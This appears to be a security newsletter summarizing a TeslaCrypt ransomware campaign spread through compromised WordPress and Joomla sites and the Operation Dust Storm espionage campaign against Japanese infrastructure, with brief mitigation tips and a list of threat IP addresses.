Ransomware Campaign Jumps from Wordpress to Joomla

This week, we hear the latest on the Operation Dust Storm cyber-attack campaign and the evolution of a ransomware-phishing campaign that now includes Joomla and WordPress sites.

Malware

Ransomware Campaign Jumps from Wordpress to Joomla

A ransomware-phishing campaign that began earlier this month has evolved from using only WordPress sites to now also including Joomla sites. Initially, hackers would hide an iframe in WordPress sites that would load malicious code and redirect users to the Nuclear exploit kit, in turn delivering the TeslaCrypt ransomware. Now, the people behind this campaign have found a way to inject their malicious code into the JavaScript files for Joomla sites as well. Once the ransomware is on the user’s computer, it can encrypt files, lock the PC and demand a ransom in order to unlock the device and decrypt the content. Using legitimate domain names as an attack vector is an increasingly popular method of attack due to traffic and exposure, and the only way operators can keep their domain names safe is to update and fully patch their website CMS systems.

References: Ransomware Scum Add Joomla To Their List | Ransomware Springboards from WordPress to Joomla Domains | TeslaCrypt Ransomware Campaign Extends from WordPress to Joomla Sites

Mitigation Strategies:

  • Log management could detect any suspicious user account activity. 
  • Security Operations Center team provides around-the-clock security monitoring, daily log review, web application firewall management and advanced anomaly detection. 

Breach

Japanese Critical Infrastructure Targeted by Operation Dust Storm

Researchers at security company Cylance have uncovered an ongoing, evolving cyber-attack campaign, which has targeted companies across Asia, Europe, and the United States. The campaign, dubbed Operation Dust Storm, began in 2010 and has been a long-term espionage operation. Recently, the focus of Operation Dust Storm has shifted to target solely Japanese companies, both public and private, in the oil/gas, power, transportation, and finance industries. Although this operation has yet to be destructive or disruptive, something alarming is that, according to Cylance’s CMO Greg Fitzgerald, this campaign is “significantly financed, significantly resourced in terms of personnel and skillset, with a sustained presence…” The group has managed to stay undetected for so long by registering new domain names, using a variety of unique backdoors, and by using dynamic DNS.

References: Japanese Infrastructure Targeted In Operation Dust Storm | Operation Dust Storm Hackers Set Sights on Japan's Critical Infrastructure | Japan's Critical Infrastructure Under 'Escalating' Cyber Attack, Says Report

Mitigation Strategies:

Top 20 IP Addresses

81.183.56.217 188.118.2.26
46.109.168.179 118.170.130.207
87.222.67.194 114.44.192.128
183.60.48.25 208.100.26.229
180.97.106.161 208.100.26.232
106.240.247.42 159.122.222.119
91.236.75.4 118.244.129.108
122.228.207.118 111.74.239.61
202.107.234.78 47.88.1.8
177.229.1.1 176.118.244.97

*IP addresses provided by Recorded Future.